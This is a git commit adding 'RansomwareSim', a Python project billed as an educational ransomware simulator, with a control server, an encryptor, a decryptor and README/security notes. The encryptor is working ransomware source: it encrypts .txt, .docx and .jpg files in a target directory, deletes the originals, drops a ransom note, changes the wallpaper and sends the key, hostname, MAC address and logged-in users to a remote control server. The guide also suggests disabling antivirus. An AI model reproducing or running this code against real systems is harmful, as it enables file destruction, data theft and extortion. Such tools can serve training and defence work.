Add files via upload

HalilDeniz · web-flow · commit 45226facfe44 · 2023-12-16T10:46:25.000+03:00
diff --git a/ControlServer.py b/ControlServer.py
@@ -0,0 +1,66 @@
+import socket
+import threading
+import json
+import logging
+from colorama import init, Fore, Style
+
+init(autoreset=True)
+class ControlServer:
+    def __init__(self, host, port, log_file):
+        self.host = host
+        self.port = port
+        self.server = None
+        self.setup_logging(log_file)
+
+    def setup_logging(self, log_file):
+        logging.basicConfig(filename=log_file, level=logging.INFO,
+                            format='%(asctime)s - %(levelname)s - %(message)s')
+
+    def handle_client(self, connection, address):
+        try:
+            data = connection.recv(1024)
+            if not data:
+                return
+
+            message = json.loads(data.decode())
+            if 'request' in message and message['request'] == 'key':
+                print(f"Key request received from: {address}")
+                key = input(f"{Fore.RED}Please enter the encryption key: {Style.RESET_ALL}")
+                response = json.dumps({'key': key})
+                connection.sendall(response.encode())
+                logging.info(key)
+            else:
+                logging.info(f"Data received from {address}: {message}")
+                print(f"{Fore.GREEN}Data received: {address}. {message}{Style.RESET_ALL}")
+        except json.JSONDecodeError:
+            logging.error("Invalid JSON data received.")
+        finally:
+            connection.close()
+
+    def start(self):
+        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        self.server.bind((self.host, self.port))
+        self.server.listen(5)
+        logging.info(f"{Fore.YELLOW}Server listening at {self.host}:{self.port}.{Style.RESET_ALL}")
+        print(f"{Fore.YELLOW}Server listening at {self.host}:{self.port}{Style.RESET_ALL}")
+
+        try:
+            while True:
+                connection, address = self.server.accept()
+                logging.info(f"Connection established from {address}.")
+                print(f"Connection established from {address}")
+                client_thread = threading.Thread(target=self.handle_client, args=(connection, address))
+                client_thread.start()
+        except KeyboardInterrupt:
+            logging.info("Shutting down the server.")
+            print("Server shut down")
+        finally:
+            self.server.close()
+
+if __name__ == "__main__":
+    HOST = '0.0.0.0'  # Listen on all interfaces
+    PORT = 12345      # Port number
+    LOG_FILE = 'server_log.txt'  # Name of the log file
+
+    control_server = ControlServer(HOST, PORT, LOG_FILE)
+    control_server.start()
diff --git a/Decoder.py b/Decoder.py
@@ -0,0 +1,75 @@
+import gc
+import socket
+import json
+import os
+from cryptography.fernet import Fernet
+
+class Decoder:
+    def __init__(self, directory, server_host, server_port):
+        self.directory = directory
+        self.server_host = server_host
+        self.server_port = server_port
+
+    def decrypt_file(self, file_path, key):
+        fernet = Fernet(key)
+        with open(file_path, 'rb') as file:
+            encrypted_data = file.read()
+        decrypted_data = fernet.decrypt(encrypted_data)
+
+        original_file_path = file_path.replace(".denizhalil", "")
+        with open(original_file_path, 'wb') as file:
+            file.write(decrypted_data)
+
+        os.remove(file_path)
+
+    def find_and_decrypt_files(self, key):
+        for root, _, files in os.walk(self.directory):
+            for file in files:
+                if file.endswith(".denizhalil"):
+                    file_path = os.path.join(root, file)
+                    self.decrypt_file(file_path, key)
+
+    def request_key_from_server(self):
+        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
+            s.connect((self.server_host, self.server_port))
+            s.sendall(json.dumps({'request': 'key'}).encode())
+            data = s.recv(1024)
+            response = json.loads(data.decode())
+            return response.get('key')
+
+    def delete_readme(self):
+
+        desktop_path = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')
+        readme_path = os.path.join(desktop_path, 'Readme.txt')
+
+        if os.path.exists(readme_path):
+            os.remove(readme_path)
+        else:
+            pass
+
+    def clear_memory(self):
+        gc.collect()
+        print("Memory cleared.")
+def main():
+    directory = 'dosyalar/'  # Replace with the target directory path
+    server_host = '10.0.2.37'
+    server_port = 12345
+    print("Waiting for key...")
+
+    try:
+        decoder = Decoder(directory, server_host, server_port)
+        key = decoder.request_key_from_server()
+
+        if key:
+            decoder.find_and_decrypt_files(key)
+            print("Files successfully decrypted.")
+            decoder.delete_readme()
+        else:
+            print("Key not found or incorrect.")
+    except Exception as e:
+        print(f"An error occurred: {e}\nPlease restart the program.")
+
+    decoder.clear_memory()
+
+if __name__ == "__main__":
+    main()
diff --git a/Encoder.py b/Encoder.py
@@ -0,0 +1,110 @@
+import gc
+import os
+import json
+import uuid
+import ctypes
+import socket
+import subprocess
+from cryptography.fernet import Fernet
+
+class RansomwareSimulator:
+    def __init__(self, directory, server_host, server_port, file_extensions):
+        self.directory = directory
+        self.server_host = server_host
+        self.server_port = server_port
+        self.file_extensions = file_extensions
+        self.key = Fernet.generate_key()
+
+    def change_wallpaper(self, image_path):
+        if os.name == 'nt':
+            ctypes.windll.user32.SystemParametersInfoW(20, 0, image_path , 0)
+
+        else:
+            print("Wallpaper change feature is not supported on this OS.")
+
+    def get_mac_address(self):
+        mac_num = hex(uuid.getnode()).replace('0x', '').upper()
+        mac_num = mac_num.zfill(12)
+        mac = ':'.join(mac_num[i: i + 2] for i in range(0, 12, 2))
+        return mac
+
+
+    def create_readme(self):
+        desktop_path = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')
+        readme_path = os.path.join(desktop_path, 'Readme.txt')
+        with open(readme_path, 'w') as file:
+            file.write("This is a simulation program, your files are encrypted.")
+
+
+    def encrypt_file(self, file_path):
+        fernet = Fernet(self.key)
+        with open(file_path, 'rb') as file:
+            original = file.read()
+        encrypted = fernet.encrypt(original)
+
+        encrypted_file_path = file_path + ".denizhalil"
+        with open(encrypted_file_path, 'wb') as encrypted_file:
+            encrypted_file.write(encrypted)
+
+        os.remove(file_path)
+        return encrypted_file_path
+
+    def find_and_encrypt_files(self):
+        encrypted_files = []
+        for root, _, files in os.walk(self.directory):
+            for file in files:
+                if any(file.endswith(ext) for ext in self.file_extensions):
+                    file_path = os.path.join(root, file)
+                    encrypted_file_path = self.encrypt_file(file_path)
+                    encrypted_files.append(encrypted_file_path)
+                    print(f"Encrypted and saved file: {encrypted_file_path}")
+        return encrypted_files
+
+    def get_active_users(self):
+        try:
+            command = 'query user' if os.name == 'nt' else 'who'
+            output = subprocess.check_output(command, shell=True)
+            return output.decode(errors='ignore')
+        except subprocess.CalledProcessError:
+            return "Unable to fetch active users"
+
+    def collect_data(self):
+        return {
+            'hostname': socket.gethostname(),
+            'key': self.key.decode(),
+            'active_users': self.get_active_users(),
+            'mac_address': self.get_mac_address()
+        }
+
+    def send_data_to_server(self):
+        data = self.collect_data()
+        self.send_to_server(json.dumps(data))
+
+    def send_to_server(self, data):
+        try:
+            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
+                s.connect((self.server_host, self.server_port))
+                s.sendall(data.encode())
+        except:
+            quit(0)
+
+    def clear_memory(self):
+        gc.collect()
+        print("Memory cleared.")
+
+def main():
+    file_extensions = ['.txt', '.docx', '.jpg']
+    directory = 'dosyalar/'  # 'dosyalar/' should be replaced with the directory path you want to target
+    wallpaper_path = r"duvarkağıtı/araba.jpg"
+    server_host = '10.0.2.37'
+    server_port = 12345
+
+    simulator = RansomwareSimulator(directory, server_host, server_port, file_extensions)
+    simulator.find_and_encrypt_files()
+    simulator.send_data_to_server()
+    simulator.change_wallpaper(wallpaper_path)  # Change the wallpaper
+    simulator.create_readme()
+    simulator.clear_memory()
+
+if __name__ == "__main__":
+    main()
diff --git a/Readme.md b/Readme.md
@@ -0,0 +1,92 @@
+# RansomwareSim
+
+<img src="img/RansomWareSim.png"></img>
+
+## Overview
+RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.
+
+## Features
+- Encrypts specified file types within a target directory.
+- Changes the desktop wallpaper (Windows only).
+- Creates&Delete a README file on the desktop with a simulated ransom note.
+- Simulates communication with a command-and-control server to send system data and receive a decryption key.
+- Decrypts files after receiving the correct key.
+
+## Usage
+**`Important`:** This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read [SECURE](SECURITY.md)
+
+## Requirements
+
+- Python 3.x
+- cryptography
+- colorama
+
+## Installation
+
+1. Clone the repository:
+
+   ```shell
+   git clone https://github.com/HalilDeniz/RansomwareSim.git
+   ```
+
+2. Navigate to the project directory:
+
+   ```shell
+   cd RansomwareSim
+   ```
+
+3. Install the required dependencies:
+
+   ```shell
+   pip install -r requirements.txt
+   ```
+
+### Running the Control Server
+1. Open `controlpanel.py`.
+2. Start the server by running `controlpanel.py`.
+3. The server will listen for connections from `RansomwareSim` and the `Decoder`.
+
+### Running the Simulator
+1. Navigate to the directory containing `RansomwareSim`.
+2. Modify the `main` function in `encoder.py` to specify the target directory and other parameters.
+3. Run `encoder.py` to start the encryption process.
+4. Follow the instructions displayed on the console.
+
+
+### Running the Decoder
+1. Run `decoder.py` after the files have been encrypted.
+2. Follow the prompts to input the decryption key.
+
+## Disclaimer
+RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.
+
+## Contributing
+Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.
+1. Fork the repository.
+2. Create a new branch for your feature or bug fix.
+3. Make your changes and commit them.
+4. Push your changes to your forked repository.
+5. Open a pull request in the main repository.
+
+
+
+## Contact
+For any inquiries or further information, you can reach me through the following channels:
+
+- LinkedIn : [Halil Ibrahim Deniz](https://www.linkedin.com/in/halil-ibrahim-deniz/)
+- TryHackMe: [Halilovic](https://tryhackme.com/p/halilovic)
+- Instagram: [deniz.halil333](https://www.instagram.com/deniz.halil333/)
+- YouTube  : [Halil Deniz](https://www.youtube.com/c/HalilDeniz)
+- Email    : halildeniz313@gmail.com
+
+
+
+## 💰 You can help me by Donating
+  Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like RansomwareSim and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!"<br>
+  [![BuyMeACoffee](https://img.shields.io/badge/Buy%20Me%20a%20Coffee-ffdd00?style=for-the-badge&logo=buy-me-a-coffee&logoColor=black)](https://buymeacoffee.com/halildeniz) 
+  [![Patreon](https://img.shields.io/badge/Patreon-F96854?style=for-the-badge&logo=patreon&logoColor=white)](https://patreon.com/denizhalil) 
+
+## License
+RansomwareSim is released under the [MIT License](LICENSE). See LICENSE for more information.
+
+  
diff --git a/SECURITY.md b/SECURITY.md
@@ -0,0 +1,20 @@
+## Security Considerations
+
+### Responsible Usage
+- **Controlled Environment**: Always use RansomwareSim in a controlled, isolated environment. It should never be run on any production or personal system.
+- **Consent and Permission**: Ensure that you have explicit consent from all individuals who have access to or are responsible for the environment where this tool is used.
+- **Data Sensitivity**: Do not use RansomwareSim on systems containing sensitive, personal, or confidential data, even in a testing environment.
+
+### Legal Compliance
+- **Ethical Conduct**: RansomwareSim is intended solely for educational and training purposes. Any use of this tool for malicious purposes is strictly prohibited.
+- **Compliance with Laws**: Users must comply with all applicable local, state, national, and international laws when using this tool. Unauthorized use of this tool may constitute a criminal offense.
+
+### Security Measures
+- **Antivirus Software**: Some antivirus programs may flag RansomwareSim as malicious. Inform participants about potential antivirus notifications and consider temporarily disabling antivirus software in a controlled testing environment.
+- **Network Security**: When running RansomwareSim, ensure that the test network is secure and isolated from other networks to prevent unintended spread or network traffic monitoring.
+
+### Data Backup
+- **Backup Important Data**: Always back up any important data before running RansomwareSim, even in a controlled environment, to prevent accidental loss.
+
+### Source Code Integrity
+- **Source Verification**: Ensure that the source code for RansomwareSim is obtained from a reliable and trusted source to prevent the execution of tampered or malicious code.
diff --git a/requirements.txt b/requirements.txt
@@ -0,0 +1 @@
+cryptography
